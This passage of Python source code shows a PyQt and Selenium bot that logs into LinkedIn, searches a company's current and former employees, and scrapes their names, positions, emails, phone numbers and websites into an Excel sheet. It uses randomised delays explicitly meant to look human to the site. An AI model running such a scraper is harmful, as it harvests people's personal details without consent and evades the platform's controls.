\"\"\"\n if self.pbar.value() < self.pbar.maximum():\n self.pbar.setValue(self.pbar.value() + 1)\n else:\n self.pbar.setValue(0)\n\n def addpage(self):\n \"\"\"\n Incrémente de 1 le statut de la page\n \"\"\"\n self.page_count += 1\n self.statut_page.setText('Page ' + str(self.page_count))\n\n def 
update_statut_recherche(self, text: str):\n \"\"\"\n Update the text of the statut_recherche label\n :param text:\n \"\"\"\n self.statut_recherche.setText(text)\n\n def update_statut_page(self, text: str):\n \"\"\"\n Update the text of the statut_page label\n :param text:\n \"\"\"\n self.statut_page.setText(text)\n\n\n##################### Real-time table interface class ############################\nclass TableTpsReel(QtWidgets.QWidget):\n \"\"\"\n Defines a window with a table that mirrors what gets appended to the\n Excel file\n \"\"\"\n update_statut_recherche = pyqtSignal(str)\n\n def __init__(self, chemin: str):\n super().__init__()\n width = 1300\n height = 790\n self.setGeometry(455, 38, width, height)\n icon = QtGui.QIcon()\n icon.addPixmap(QtGui.QPixmap(\"Adentis_icon.png\"), QtGui.QIcon.Normal, QtGui.QIcon.Off)\n self.setWindowIcon(icon)\n self.setWindowTitle(\"Résultat\")\n\n self.gridLayout = QtWidgets.QGridLayout(self)\n self.gridLayout.setContentsMargins(0, 0, 0, 0)\n self.gridLayout.setObjectName(\"gridLayout\")\n\n self.tableWidget = QtWidgets.QTableWidget(self)\n self.tableWidget.setObjectName(\"tableWidget\")\n sh = load_workbook(chemin) # open the workbook\n sh = sh[sh.sheetnames[0]] # first sheet\n self.tableWidget.setColumnCount(sh.max_column)\n self.tableWidget.setRowCount(0)\n\n self.remplissage_table_init(sh)\n self.gridLayout.addWidget(self.tableWidget, 0, 0, 1, 1)\n self.show()\n\n def remplissage_table_init(self, sh):\n \"\"\"\n Copy the values from the Excel file into the table widget\n :param sh:\n \"\"\"\n # check that the first row holds column names (empty cells are None, so test truthiness rather than len())\n if sh.cell(row=1, column=1).value or sh.cell(row=1, column=2).value:\n for colnum in range(1, sh.max_column + 1):\n # use the first-row values as column headers in the table widget\n item = QtWidgets.QTableWidgetItem(sh.cell(row=1, column=colnum).value)\n self.tableWidget.setHorizontalHeaderItem(colnum - 1, item)\n # if the Excel file already holds data (from the second row on)\n if sh.max_row > 1:\n for rownum in range(2, sh.max_row + 1):\n self.tableWidget.insertRow(self.tableWidget.rowCount()) # append a row to the tableWidget\n for colnum in range(1, sh.max_column + 1): # + 1 so the last column is not dropped\n # fill the table widget from the Excel file\n item = QtWidgets.QTableWidgetItem(sh.cell(row=rownum, column=colnum).value)\n self.tableWidget.setItem(self.tableWidget.rowCount() - 1, colnum - 1, item)\n # scroll the table down to the last row\n self.tableWidget.scrollToBottom()\n\n # colidx maps each column-name keyword to its column index in the table.\n self.colidx = dict()\n # colname lists the column-name keywords that are looked up in the Excel file\n self.colname = ['société', 'domain', 'nom', 'profil', 'fonction', 'tel', 'mail', 'localisation', 'site']\n # loop through headers and find column number for given column name\n headercount = self.tableWidget.columnCount()\n for x in range(0, headercount, 1):\n headertext = self.tableWidget.horizontalHeaderItem(x).text()\n self.colidx.update({columnname: x for columnname in self.colname if\n self.supprime_accent(columnname).upper() in self.supprime_accent(\n headertext).upper()})\n else:\n raise ValueError # no column names in the first row: raise an error\n\n def remplissage_table(self, info: dict):\n \"\"\"\n Fill the table widget with the information from the dict returned by Bot\n :param info:\n \"\"\"\n try:\n
self.tableWidget.insertRow(self.tableWidget.rowCount()) # insert a new row at the end of the table\n for col in self.colidx.keys():\n if col in info.keys(): # if the column-name keyword matches one of the keys of the info dict\n # put the matching info at the right place in the right column\n item = QtWidgets.QTableWidgetItem(info[col])\n self.tableWidget.setItem(self.tableWidget.rowCount() - 1, self.colidx[col], item)\n self.tableWidget.scrollToBottom() # keep the last row visible at all times\n except:\n self.update_statut_recherche.emit('Problème dans l\"écriture des infos dans le tableau')\n\n def supprime_accent(self, ligne: str):\n \"\"\" strips the accents from the source text \"\"\"\n accents = {'a': ['à', 'ã', 'á', 'â'],\n 'e': ['é', 'è', 'ê', 'ë'],\n 'i': ['î', 'ï'],\n 'u': ['ù', 'ü', 'û'],\n 'o': ['ô', 'ö'],\n ' ': ['-', '_']}\n for (char, accented_chars) in accents.items():\n for accented_char in accented_chars:\n ligne = ligne.replace(accented_char, char)\n return ligne\n\n\n############################## Bot class ###########################################\n####################################################################################\n\nclass Communicate(QObject):\n \"\"\"\n Signal class used to update the progress bar and the table\n \"\"\"\n update_statut_recherche = pyqtSignal(str)\n update_statut_page = pyqtSignal(str)\n update_pbar = pyqtSignal()\n update_table = pyqtSignal(dict)\n add_page = pyqtSignal()\n get_max = pyqtSignal(int)\n\n\nclass Bot(QThread):\n \"\"\"\n Bot class that starts the bot and runs the linkedin search to scan the profiles returned by the search\n parameters: identifiant, mdp, societe, region, into_profil, recherche_type, chemin, keywords, antikeywords, navigateur\n \"\"\"\n\n def __init__(self, identifiant, mdp, societe, region, into_profil, recherche_type, chemin, keywords, antikeywords,\n navigateur):\n super().__init__()\n # Data entered in the GUI\n self.inputUser = dict()\n self.inputUser['USER'] = identifiant\n self.inputUser['PASSWORD'] = mdp\n self.inputUser['REGION'] = region\n self.inputUser['ENTREPRISE'] = societe\n self.inputUser['intoProfile'] = into_profil\n self.inputUser['recherche_type'] = recherche_type\n self.keywords = keywords\n self.antikeywords = antikeywords\n self.chemin = chemin\n self.nav = navigateur\n self.c = Communicate()\n self.continueflag = True\n self.pauseflag = False\n self.domain=''\n self.targetedInfo = ['nom', 'fonction', 'société', 'profil', 'localisation', 'tel', 'mail', 'site', 'domain',\n 'auparavant']\n # Open a background browser according to the user's choice\n # Add the browser driver to the PATH environment variable if it is not there yet\n if self.nav == 'Firefox':\n if os.path.join(os.getcwd(), 'geckodriver') not in os.environ['PATH']:\n os.environ['PATH'] = os.environ['PATH'] + ';' + os.path.join(os.getcwd(), 'geckodriver')\n options = webdriver.FirefoxOptions()\n options.set_headless(headless=True)\n self.browser = webdriver.Firefox(options=options)\n self.browser.implicitly_wait(1)\n\n elif self.nav == 'Chrome':\n if os.path.join(os.getcwd(), 'chromedriver') not in os.environ['PATH']:\n os.environ['PATH'] = os.environ['PATH'] + ';' + os.path.join(os.getcwd(), 'chromedriver')\n options = webdriver.ChromeOptions()\n options.set_headless(headless=True)\n self.browser = webdriver.Chrome(options=options)\n self.browser.implicitly_wait(1)\n\n def run(self):\n while True:\n # Method executed when the thread is started\n login = self.login_linkedin() # Attempt to log in on the linkedin page\n if login is True:\n self.c.update_statut_recherche.emit(\"Identification réussie\")\n\n # Checkpoint to stop the search if the user pressed STOP\n if self.continueflag is False:\n self.c.update_statut_recherche.emit(\"Recherche stoppée par l'utilisateur\")\n break\n nom_entreprise = 'OK'\n # Defaults the variable to OK; nom_entreprise is refreshed when the company field is filled in\n if len(self.inputUser['ENTREPRISE']) > 0:\n # Run a search on the company to extract its domain\n try:\n self.browser.get(self.create_url_to_search(self.inputUser['ENTREPRISE'], typeSearch='companies'))\n except:\n self.c.update_statut_recherche.emit('Erreur lors du chargement de la page')\n break\n\n if self.continueflag is False:\n self.c.update_statut_recherche.emit(\"Recherche stoppée par l'utilisateur\")\n break\n\n self.waiting_for('search/results/') # Wait for the page to load and the url to change\n self.domain, nom_entreprise = self.get_company_domain() # Extract the company's domain\n\n if nom_entreprise == 'OK':\n # Run a search on this company's employees\n try:\n self.browser.get(\n self.create_url_to_search(self.inputUser['ENTREPRISE'], self.inputUser['REGION'],\n typeSearch='people'))\n # self.waiting_for('search/results/')\n wait = self.wait_for_full_loading()\n # print(self.browser.current_url)\n\n self.filtre_entreprise_actuelle()\n\n # Start the bot\n self.view_bot() # Start harvesting the info of the search\n break # then leave the loop so the thread closes cleanly\n\n except Exception as exception:\n # If an error is caught,\n # report the line and the error type in the code, then exit the app cleanly.\n # Eases debugging without crashing the app and without leaving the thread open\n self.c.update_statut_recherche.emit(\n \"line {} {} {}\".format(exception.__traceback__.tb_lineno,\n type(exception).__name__,\n exception.with_traceback(exception.__traceback__)))\n self.sleep(5) # Give the user time to read the error message\n break\n else:\n self.c.update_statut_recherche.emit('Aucune correspondance avec l\"entreprise recherchée')\n break\n else:\n break\n self.browser.quit() # Close the browser\n\n def login_linkedin(self):\n \"\"\"\n Logs in on linkedin\n :return:\n \"\"\"\n try:\n self.browser.get('https://www.linkedin.com/uas/login')\n except WebDriverException:\n self.c.update_statut_recherche.emit(\n 'Impossible d\"atteindre la page d\"identification, Vérifier la connexion')\n return False\n\n self.waiting_for2('https://www.linkedin.com/uas/login')\n if self.browser.current_url == 'https://www.linkedin.com/uas/login':\n emailElement = self.browser.find_element_by_id(\"session_key-login\")\n emailElement.send_keys(self.inputUser['USER'])\n passElement = self.browser.find_element_by_id('session_password-login')\n passElement.send_keys(self.inputUser['PASSWORD'])\n passElement.submit()\n # Waiting for the home page to load with timeout\n self.c.update_statut_recherche.emit('Identification...')\n self.waiting_for2(\"https://www.linkedin.com/feed/?trk=\")\n if self.browser.current_url == \"https://www.linkedin.com/feed/?trk=\":\n return True\n else:\n self.c.update_statut_recherche.emit(\n 'L\"identification a échoué, vérifier les identifiants et mots de passe')\n return False\n else:\n self.c.update_statut_recherche.emit(\n 'La durée de connexion à la page est anormalement longue, vérifiez votre connexion')\n return False\n\n def create_url_to_search(self, *keywords, typeSearch: str):\n \"\"\"\n Create the url of the search based on the user input\n :param keywords:\n :param typeSearch:\n :rtype str:\n \"\"\"\n basic_url_start = 'https://www.linkedin.com/search/results/' + typeSearch + '/?keywords='\n basic_url_end = '&origin=GLOBAL_SEARCH_HEADER'\n # if typeSearch == \"people\":\n # basic_url_end = basic_url_end + '&page=34'\n for keyword in keywords:\n basic_url_start = basic_url_start + '%20' + keyword.replace(' ', '%20')\n self.c.update_statut_recherche.emit(\"[+] Searching for : {}\".format(keywords))\n return basic_url_start + basic_url_end\n\n def get_company_domain(self):\n \"\"\"\n Extracts the business-domain info of the searched company\n :return:\n \"\"\"\n page = BeautifulSoup(self.browser.page_source, \"html.parser\")\n nom_entreprise = 'Aucune correspondance'\n domain = \"\"\n for link in page.find_all('div', class_='search-result__info pt3 pb4 pr0'):\n try:\n if self.supprime_accent(self.inputUser['ENTREPRISE']).upper() in self.supprime_accent(\n link.select('a > h3')[0].text.strip()).upper():\n nom_entreprise = 'OK'\n domain = link.select('p.subline-level-1.Sans-15px-black-85%.search-result__truncate')[\n 0].text.strip()\n # print(domain)\n if domain is not False:\n break\n except:\n break\n return domain, nom_entreprise\n\n def filtre_entreprise_actuelle(self):\n \"\"\"\n Clicks the 'Tous les filtres' button of the search page and ticks the relevant fields according to\n the user's option ('Actuel', 'Auparavant', 'Actuel+Auparavant'),\n and enables the location filter whenever possible\n :return:\n \"\"\"\n try:\n self.browser.execute_script(\"window.scrollTo(0, 0);\") # make sure we are at the top of the page\n # Click the advanced-filters button\n self.browser.find_element_by_xpath(\n \"//button[@class='search-filters-bar__all-filters button-tertiary-medium-muted mr3']\").click()\n # Grab the container holding the filter options\n form = self.browser.find_element_by_xpath(\"//div[@class='search-advanced-facets__layout display-flex ph0']\")\n # Grab the header container holding the buttons that apply the filters\n form_header = self.browser.find_element_by_xpath(\n \"//div[@class='search-advanced-facets__layout display-flex align-items-center justify-space-between']\")\n\n # If the user chose the Actuel+Auparavant mode, do nothing: that is the standard search\n if len(self.inputUser['ENTREPRISE']) > 0: # If the company field is filled in\n if self.inputUser['recherche_type'] == 'Actuel': # If the user chose the Actuel mode\n # Locate the option container of the current-company filter\n zoneactuel = form.find_element_by_xpath(\n \".//fieldset[@class='search-s-facet__values search-s-facet__values--facetCurrentCompany']\")\n self.browser.execute_script(\"arguments[0].scrollIntoView(true);\", zoneactuel)\n # grab the blocking div that must be bypassed to select the companies\n block = zoneactuel.find_element_by_xpath(\n \".//ol[@class='search-s-facet__list list-style-none']\")\n\n # Grab LinkedIn's suggestions\n listentreprise = zoneactuel.find_elements_by_xpath(\".//li[@class='search-facet__value ']\")\n for entreprise in listentreprise:\n entrepriseid = entreprise.find_element_by_xpath(\n \".//label[@class='search-s-facet-value__label Sans-15px-black-70%']\")\n # print(entrepriseid.text)\n\n if self.supprime_accent(self.inputUser['ENTREPRISE']).upper() in self.supprime_accent(\n entrepriseid.text).upper():\n # Grab the clickable element\n entreprise.find_element_by_xpath(\".//input[@class='medium-input mr3']\")\n # Click the company checkbox, going past the blocking div\n webdriver.ActionChains(self.browser).move_to_element(block).click(entreprise).perform()\n break\n\n if self.inputUser['recherche_type'] == 'Auparavant': # If the user chose the Auparavant mode\n zoneauparavant = form.find_element_by_xpath(\n \".//fieldset[@class='search-s-facet__values search-s-facet__values--facetPastCompany']\")\n self.browser.execute_script(\"arguments[0].scrollIntoView(true);\", zoneauparavant)\n # self.sleep(2)\n block = zoneauparavant.find_element_by_xpath(\n \".//ol[@class='search-s-facet__list list-style-none']\") # grab the blocking div that must be bypassed to select the companies\n listentreprise = zoneauparavant.find_elements_by_xpath(\".//li[@class='search-facet__value ']\")\n for entreprise in listentreprise:\n entrepriseid = entreprise.find_element_by_xpath(\n \".//label[@class='search-s-facet-value__label Sans-15px-black-70%']\")\n # print(entrepriseid.text)\n if self.supprime_accent(self.inputUser['ENTREPRISE']).upper() in self.supprime_accent(\n entrepriseid.text).upper():\n # Grab the clickable element\n entreprise.find_element_by_xpath(\".//input[@class='medium-input mr3']\")\n # Click the company checkbox, going past the blocking div\n webdriver.ActionChains(self.browser).move_to_element(block).click(entreprise).perform()\n self.sleep(1)\n break\n\n try:\n # Read the location input and search for 'REGION DE <ville>' to extract the city,\n # preserving the ability to use other search terms in the location part\n # of the interface\n region = re.search(\"REGION DE \" + r\"[\\w]+\", self.supprime_accent(self.inputUser['REGION']).upper())\n if region:\n ville = region.group().replace('REGION DE ', \"\")\n\n # Apply the filter on the geographic area when linkedin offers it\n zonelieu = form.find_element_by_xpath(\n \".//fieldset[@class='search-s-facet__values search-s-facet__values--facetGeoRegion']\")\n self.browser.execute_script(\"arguments[0].scrollIntoView(true);\", zonelieu)\n # self.sleep(2)\n\n # grab the blocking div that must be bypassed to select the locations\n block = zonelieu.find_element_by_xpath(\n \".//ol[@class='search-s-facet__list list-style-none']\")\n listlieu = zonelieu.find_elements_by_xpath(\".//li[@class='search-facet__value ']\")\n\n for lieu in listlieu:\n lieuid = lieu.find_element_by_xpath(\n \".//label[@class='search-s-facet-value__label Sans-15px-black-70%']\")\n # print(lieuid.text)\n\n if ville in self.supprime_accent(\n lieuid.text).upper():\n # Grab the clickable element\n lieu.find_element_by_xpath(\".//input[@class='medium-input mr3']\")\n # Click the location checkbox, going past the blocking div\n webdriver.ActionChains(self.browser).move_to_element(block).click(lieu).perform()\n break\n\n except exceptions.NoSuchElementException: # If the filter section is not reachable\n self.c.update_statut_recherche.emit(\n \"Le filtre région n'est pas disponible\")\n self.sleep(5) # give the user time to read the error message\n\n # click the button that applies the filters\n form_header.find_element_by_xpath(\n \".//button[@class='search-advanced-facets__button--apply button-primary-large']\").click()\n 
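# Applying the filters reloads the result list in place; the pause and the full-load wait that follow keep the bot from parsing a half-rendered page.\n 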
self.sleep(5) # let the filtered results settle\n self.wait_for_full_loading()\n except:\n self.c.update_statut_recherche.emit(\n 'Problème dans la sélection des filtres, Actuel + Auparavant par défaut')\n self.inputUser['recherche_type'] = 'Actuel+Auparavant'\n self.sleep(5) # give the user time to read the error message\n\n def view_bot(self):\n \"\"\"\n Core of the Bot, drives the other functions\n :return:\n \"\"\"\n visited = self.get_visited()\n count = 0 # Counts the number of accepted profiles\n pidx = 1 # Page counter\n page = BeautifulSoup(self.browser.page_source, \"html.parser\")\n\n while self.continueflag: # Loop until the last page of the search results\n\n # save the url of the search page to come back to it after visiting profiles\n search_page = self.browser.current_url\n\n self.pause() # check the pauseflag and pause while it is True\n\n people, job, loc, statut = self.get_people_links(page, visited)\n # collect the links of the people matching the keywords and not already present in the excel file\n\n if people:\n self.c.get_max.emit(len(people))\n for nom, person in people.items(): # For each profile matching the criteria\n # print(nom)\n # print(statut[nom])\n # print(job[nom])\n self.pause() # check the pauseflag and pause while it is True\n\n if self.continueflag is False: # If the STOP button was pressed during the loop, leave the loop\n break\n\n info = dict() # init the dict that will collect the current profile's info\n\n time.sleep(random.uniform(3.5, 6.9)) # add random to make us look human\n\n ID = self.get_id(people[nom]) # build the profile's full URL\n\n count += 1\n\n # Grab the info shown on the search page\n info = self.get_list_info(nom, job, ID, loc, statut[nom])\n # Update the search status in the progress window\n self.c.update_statut_recherche.emit(\n \"[+]\" + nom + \" checked \\n (\" + str(count) + \") Checked\")\n\n if self.inputUser['intoProfile'] is True or info['statut'] == 'Indéterminé':\n\n self.browser.get(ID) # open the profile\n\n self.waiting_for2(\"/in/\") # Wait for the page to load\n\n if \"/in/\" in self.browser.current_url:\n info = self.get_profile_infos(info) # Grab the info from the person's profile page\n\n # Update the search status in the progress window\n self.c.update_statut_recherche.emit(\"Profil visited!\")\n else:\n # if the profile link leads nowhere (\"Utilisateur Linkedin non accessible\" page)\n # move on to the next link\n continue\n\n self.c.update_pbar.emit() # update the progress bar\n # Only write to the table when it is a current position\n if info['statut'] == 'Actuel':\n # Fill the domain field only when it is the current company\n info['domain'] = self.domain\n self.c.update_table.emit(info) # Fill the table\n\n self.transfer_excel(info) # Transfer the harvested data to excel\n visited.add(nom) # Add the new name to the list of visited profiles\n\n else: # If nobody was kept from the search page\n self.c.update_statut_recherche.emit('Aucune correspondance')\n\n if self.browser.current_url != search_page:\n self.browser.get(search_page) # go back to the search page\n\n wait = self.wait_for_full_loading() # Wait for the page to load\n if wait == 1:\n raise exceptions.TimeoutException('Temps de chargement de la page anormalement long')\n\n self.pause() # check the pauseflag and pause while it is True\n\n 
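# Pagination: every failure mode below (missing next button, unchanged url) is treated as the end of the result set rather than as a fatal error.\n 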
try:\n self.browser.find_element_by_xpath(\"//button[@class='next']\").click() # Click the next button\n pidx += 1\n self.waiting_for(\"&page=\" + str(pidx)) # Wait for the page to load\n wait = self.wait_for_full_loading() # Wait for the page to load\n if wait == 1:\n raise exceptions.TimeoutException('Temps de chargement de la page anormalement long')\n\n # print(self.browser.current_url)\n if self.browser.current_url == search_page: # If the url did not change after next, leave the loop\n self.c.update_statut_page.emit('Passage de page défaillant')\n break # So this message is the last one the user sees, not the except messages\n\n page = BeautifulSoup(self.browser.page_source, \"html.parser\") # parse the source of the new page\n self.c.add_page.emit() # Update the page counter of the progress window\n\n except: # If the next button cannot be found\n self.c.update_statut_page.emit('Dernière page atteinte')\n self.c.update_statut_recherche.emit('Plus personne à voir')\n self.sleep(5)\n break\n\n if self.continueflag is False: # If the search was stopped by the user\n self.c.update_statut_recherche.emit(\"Recherche stoppée par l'utilisateur\")\n\n return\n\n def get_visited(self):\n \"\"\"\n Reads the excel file and collects the names already included in the name list\n :return: visited\n \"\"\"\n visited = set()\n sh = load_workbook(self.chemin)\n # Look up the visited profiles in the first sheet\n sh = sh[sh.sheetnames[0]]\n colname = self.get_excel_columnid(sh)\n for rownum in range(1, sh.max_row + 1):\n visited.add(str(sh.cell(row=rownum, column=colname['nom']).value))\n ## Look up the visited profiles in the 2nd sheet as well\n # sh = sh[sh.sheetnames[1]]\n # colname = self.get_excel_columnid(sh)\n # for rownum in range(1, sh.max_row + 1):\n # visited.add(str(sh.cell(row=rownum, column=colname['nom']).value))\n return visited\n\n def get_id(self, url: str):\n \"\"\"\n Builds the full url of the linkedin profile\n :param url:\n :return:\n \"\"\"\n root = 'http://www.linkedin.com'\n return root + url\n\n def get_people_links(self, page, visited):\n \"\"\"\n Collects the links of the search page according to how the current position matches the keywords and the antikeywords\n :rtype dict:\n \"\"\"\n links = dict()\n job = dict()\n loc = dict()\n statut = dict()\n\n for link in page.find_all('div', class_='search-result__info pt3 pb4 ph0'):\n lien = link.find('a')\n url = lien.get('href')\n # print(url)\n poste1 = \"\" # current position when available\n poste2 = \"\" # position description\n lieu = \"\" # the person's location\n if url:\n if '/in/' in url and url not in links.values():\n nom = link.find('span', class_='name actor-name').text\n # Look for the current position\n try:\n poste1 = link.find('p',\n class_='search-result__snippets mt2 Sans-13px-black-55% ember-view').text\n if 'Actuel :' in poste1:\n poste1 = poste1.replace('Actuel :', '').strip()\n else:\n poste1 = \"\"\n\n except:\n pass\n # When the current position is unavailable, fall back to the person's headline\n try:\n poste2 = link.select('p.subline-level-1.Sans-15px-black-85%.search-result__truncate')[\n 0].text.strip()\n except:\n pass\n # Look for the workplace, to check it matches the requested location\n try:\n lieu = link.select('p.subline-level-2.Sans-13px-black-55%.search-result__truncate')[\n 0].text.strip()\n except:\n pass\n\n poste = poste1 + ' ' + poste2 # concatenate both lines to be sure to catch as many keywords as possible\n alerte_anti_key = 0 # init the flag\n for antikeyword in self.antikeywords:\n if poste:\n if self.supprime_accent(\n antikeyword).upper() in self.supprime_accent(poste).upper():\n # As soon as one antikeyword is spotted, set the flag and leave the loop\n alerte_anti_key = 1\n break\n # print(nom)\n # print(poste)\n for keyword in self.keywords:\n if poste:\n if self.supprime_accent(keyword).upper() in self.supprime_accent(poste).upper() \\\n and alerte_anti_key == 0 and nom not in visited:\n # filter on the positions and on the names already present in the excel file\n if keyword == 'CTO' and 'DIRECTOR' in self.supprime_accent(poste).upper():\n continue # resolves an ambiguity: 'CTO' is a substring of 'direCTOr'\n\n links[nom] = url\n if 'CHEZ ' in self.supprime_accent(\n poste1).upper() or ' AT ' in self.supprime_accent(poste1).upper():\n job[nom] = poste1 # the \"Actuel\" position line\n else:\n job[nom] = poste2 # the headline\n\n loc[nom] = lieu\n\n if self.supprime_accent(\n self.inputUser['ENTREPRISE']).upper() in self.supprime_accent(poste).upper():\n # The company name appears in the position lines -> current position\n statut[nom] = 'Actuel'\n else:\n if 'CHEZ ' in self.supprime_accent(\n poste).upper() or ' AT ' in self.supprime_accent(poste).upper():\n # 'Chez' or 'At' found -> another company is mentioned -> new position\n statut[nom] = 'Nouveau'\n else: # No company mention in the position lines\n statut[nom] = 'Indéterminé'\n # print(nom)\n # print(job[nom])\n\n break\n\n self.c.update_statut_recherche.emit('Récupération de ' + str(len(links)) + ' liens OK')\n return links, job, loc, statut\n\n def get_list_info(self, nom: str, job: dict, ID: str, loc: dict, statut: str):\n \"\"\"\n Extracts the info straight from the search page\n :param nom:\n :param job:\n :param ID:\n :param loc:\n :return:\n \"\"\"\n info = {target: \"\" for target in self.targetedInfo} # init the values of the dict\n info['nom'] = nom\n info['fonction'] = job[nom]\n info['localisation'] = loc[nom]\n try:\n boite = job[nom][job[nom].upper().index('CHEZ') + 5:]\n except ValueError:\n try:\n boite = job[nom][job[nom].upper().index(' AT ') + 3:]\n except ValueError:\n boite = self.inputUser['ENTREPRISE'] + ' (défaut)'\n info['société'] = boite\n info['profil'] = ID\n info['statut'] = statut\n return info\n\n def profile_infos_button(self):\n \"\"\"\n Tries to find the drop-down button giving access to the personal info of the profiles\n :return:\n \"\"\"\n try:\n # Look for the button on a profile not connected to the user\n button = self.browser.find_element_by_css_selector('.pv-top-card-v2-section__contact-info')\n button.click()\n time.sleep(2) # Give it time to load\n return True\n except:\n self.c.update_statut_recherche.emit(\"Pas trouvé le bouton\")\n time.sleep(3)\n return False\n\n def get_info_links(self, profilePage, info: dict):\n \"\"\"\n Grabs the personal info from the profile and stores it in a dict\n :param profilePage:\n :param info:\n :return info:\n \"\"\"\n\n # contact = profilePage.select(\"div.pv-profile-section__section-info.section-info\")\n try:\n 
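# Each contact field sits in its own pv-contact-info section of the markup; every select below is wrapped in try/except because any field may be missing depending on the connection level with the user.\n 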
i = profilePage.select('section.pv-contact-info__contact-type.ci-vanity-url > '\n 'div.pv-contact-info__ci-container > '\n 'a')[0]\n info['profil'] = i.get('href')\n # print(info['profil'])\n except:\n pass\n\n try:\n i = profilePage.select(\"section.pv-contact-info__contact-type.ci-email > \"\n \"div.pv-contact-info__ci-container > \"\n \"a\")[0]\n info['mail'] = i.get('href')\n except:\n pass\n\n try:\n i = profilePage.select('section.pv-contact-info__contact-type.ci-websites > '\n 'ul.list-style-none > '\n 'li.pv-contact-info__ci-container > div > a')[0]\n info['site'] = i.get('href')\n # print(info['site'])\n except:\n pass\n return info\n\n def get_profile_infos(self, info: dict):\n \"\"\"\n Grabs the info available on the linkedin profile page and saves it into the info dict.\n If statut == 'Indéterminé', scan the experience section for the latest position and check whether\n the company matches the searched company;\n the statut entry of the info dict is then set to 'Actuel' or 'Nouveau'.\n If the Coordonnées option is ticked, grab the available contact details (depends on the connection level with the user)\n :param info:\n :return:\n \"\"\"\n # Scroll through the whole page so that every element of the profile loads and becomes reachable\n # in the page source\n for x in range(0, 5000, 5):\n self.browser.execute_script(\"window.scrollTo(0, {});\".format(x))\n\n profilePage = BeautifulSoup(self.browser.page_source, \"html.parser\")\n\n try:\n info['localisation'] = \\\n profilePage.select(\"h3.pv-top-card-section__location.Sans-17px-black-55%-dense.mt1.inline-block\")[\n 0].text.strip()\n except:\n info['localisation'] = ''\n\n if info['statut'] == 'Indéterminé':\n xpcount = 0\n for experience in profilePage.find_all('li',\n class_='pv-profile-section__card-item pv-position-entity ember-view'):\n # print(experience)\n xpcount += 1\n entreprise = experience.select('h4.Sans-17px-black-85% > span.pv-entity__secondary-title')[\n 0].text.strip()\n\n if xpcount == 1: # The most recent position, hence the first entry of the section\n info['société'] = entreprise\n info['fonction'] = experience.select('h3.Sans-17px-black-85%-semibold')[0].text.strip()\n if self.supprime_accent(self.inputUser['ENTREPRISE']).upper() in self.supprime_accent(\n entreprise).upper():\n info['statut'] = 'Actuel'\n break # Current position found: no need to look further, leave the loop\n else:\n info['statut'] = 'Nouveau'\n\n else: # Look for the position the person held while working at the searched company\n if self.supprime_accent(self.inputUser['ENTREPRISE']).upper() in self.supprime_accent(\n entreprise).upper():\n info['auparavant'] = experience.select('h3.Sans-17px-black-85%-semibold')[0].text.strip() \\\n + ' chez ' + entreprise\n\n if self.inputUser['intoProfile']:\n button = self.profile_infos_button()\n # Unfold the menu where the contact info can be found\n if button:\n info = self.get_info_links(profilePage, info)\n try:\n info['tel'] = profilePage.select(\n \"section.pv-contact-info__contact-type.ci-phone > ul.list-style-none > \"\n \"li.pv-contact-info__ci-container > span.Sans-15px-black-85%\")[\n 0].text.strip()\n # print(info['tel'])\n except:\n info['tel'] = 'indisponible'\n else:\n info['profil'] = self.browser.current_url\n\n return info\n\n def transfer_excel(self, infos: dict):\n \"\"\"\n Takes the info of the linkedin profiles and writes it to the excel file chosen by the user\n :param infos:\n :return:\n \"\"\"\n try:\n book = load_workbook(self.chemin)\n if infos['statut'] == 'Actuel':\n # The person currently works at the company\n sheet = book[book.sheetnames[0]] # write to the first sheet of the excel file\n elif infos['statut'] == 'Nouveau':\n # The person left the company but used to work there\n sheet = book[book.sheetnames[1]] # write to the second sheet of the excel file\n else:\n sheet = book[book.sheetnames[0]] # By default write to the first sheet\n\n new_row = sheet.max_row + 1\n colidx = self.get_excel_columnid(sheet)\n linkFont = Font(color=colors.BLUE, underline='single', name='Arial')\n for key in self.targetedInfo:\n if key in colidx.keys():\n if key == 'profil' or key == 'mail':\n sheet.cell(row=new_row, column=colidx[key]).hyperlink = infos[key]\n sheet.cell(row=new_row, column=colidx[key]).font = linkFont\n else:\n sheet.cell(row=new_row, column=colidx[key]).value = infos[key]\n\n book.save(self.chemin)\n status = 0\n except:\n self.c.update_statut_recherche.emit(\"L'écriture dans le fichier excel a rencontré un problème\")\n status = 1\n return status\n\n def get_excel_columnid(self, sh):\n \"\"\"\n Reads the excel file and collects the indexes of the various columns\n :param sh:\n \"\"\"\n # keywords = ['nom', 'fonction', 'société', 'tel', 'mail', 'profil', 'domain', 'localisation','site']\n colnumid = dict()\n for keyword in self.targetedInfo:\n colnumid.update({keyword: colnum for colnum in range(1, sh.max_column + 1) if\n self.supprime_accent(keyword).upper() in self.supprime_accent(\n str(sh.cell(row=1, column=colnum).value)).upper()})\n return colnumid\n\n\n def pause(self):\n \"\"\"\n Checks the status of pauseflag and waits while it is True\n :return:\n \"\"\"\n while self.pauseflag: # while progress.btn_pause is pressed, pauseflag stays True\n self.c.update_statut_recherche.emit(\"Recherche mise en pause par l'utilisateur\")\n time.sleep(1) # wait while pauseflag is True\n if self.continueflag is False: # during the pause, pressing the STOP button sets continueflag to False\n break # leave the loop when continueflag is False\n\n def waiting_for(self, waitingfor):\n \"\"\"\n Wait until the waitingfor string is contained in the url\n \"\"\"\n while waitingfor not in self.browser.current_url:\n time.sleep(random.uniform(3.5, 6.9))\n\n def waiting_for2(self, waitingfor, timeout=5):\n \"\"\"\n Wait until the waitingfor string is contained in the url\n \"\"\"\n count = 0\n while waitingfor not in self.browser.current_url and count < timeout:\n count += 1\n # self.c.update_statut_recherche.emit(str(count))\n time.sleep(3)\n\n def wait_for_full_loading(self):\n \"\"\"\n Wait for full loading\n :return:\n \"\"\"\n delay = 10\n error = 0\n try:\n self.browser.execute_script(\"window.scrollTo(0, document.body.scrollHeight);\")\n myElem = WebDriverWait(self.browser, delay).until(\n EC.presence_of_element_located((By.ID, 'expanded-footer')))\n # print('Page is ready!')\n except TimeoutException:\n self.c.update_statut_recherche.emit(\n 'La durée de connexion à la page est anormalement longue, vérifiez votre connexion')\n error = 1\n return error\n\n def supprime_accent(self, ligne):\n \"\"\" strips the accents from the source text \"\"\"\n accents = {'a': ['à', 'ã', 'á', 'â', 'à'.upper(), 'ã'.upper(), 'á'.upper(), 'â'.upper()],\n 'e': ['é', 'è', 'ê', 'ë', 'é'.upper(), 'è'.upper(), 'ê'.upper(), 'ë'.upper()],\n 'i': ['î', 'ï', 'î'.upper(), 'ï'.upper()],\n 'u': ['ù', 'ü', 'û', 'ù'.upper(), 'ü'.upper(), 'û'.upper()],\n 'o': ['ô', 'ö', 'ô'.upper(), 'ö'.upper()],\n ' ': 